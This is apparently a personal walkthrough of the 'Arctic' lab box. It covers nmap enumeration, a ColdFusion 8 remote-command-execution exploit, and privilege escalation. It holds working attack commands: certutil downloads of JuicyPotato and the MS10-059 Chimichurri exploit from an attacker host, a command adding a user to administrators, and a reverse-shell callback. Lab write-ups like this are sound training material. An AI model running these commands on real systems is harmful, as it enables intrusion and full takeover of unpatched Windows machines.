Arctic

Personal Rating: Easy

Enumeration

This is interesting:

Not shown: 65532 filtered tcp ports (no-response)
PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|7|2008|Vista|8.1 (90%)

Port 8500 might be “Adobe ColdFusion built-in web server”.

I tried this but it did not work: https://pentest.tonyng.net/attacking-adobe-coldfusion/

RCE

The admin page shows that it is ColdFusion 8.

This looks promising, which I found with searchsploit coldfusion 8:

Adobe ColdFusion 8 - Remote Command Execution (RCE) | cfm/webapps/50057.py

The exploit worked!

The user we have is “tolis”. It's a Windows Server 2008 R2 Standard with no hotfixes installed.

whoami /priv reveals that the user has the SeImpersonatePrivilege

Privilege Escalation

Since it is an old Windows and we have the SeImpersonatePrivilege, the Potato exploits came to mind.

Transfer the file: certutil -urlcache -split -f "http://10.10.16.6:8000/JuicyPotato" juicypotato

This seems to have worked, but I do not know how to access the process: .\juicypotato -l 1337 -p c:\windows\system32\cmd.exe -t *

This should add tolis to the admins group, which contains “net localgroup administrators tolis /add”:

.\JuicyPotato.exe -l 1337 -p C:\Users\tolis\privesc.bat -t *

This worked. I then tried to use the UACME project, but this is likely a very complicated way.

This was way easier:

certutil -urlcache -split -f "http://10.10.16.6:8000/MS10-059-Chimichurri.exe" exploit.exe
.\exploit.exe 10.10.16.6 1337

I noticed that it can be fairly difficult to do easy boxes without Metasploit. The important takeaway is to enumerate vulnerabilities properly and choose a simple exploit to take less time, as there are multiple ways often times.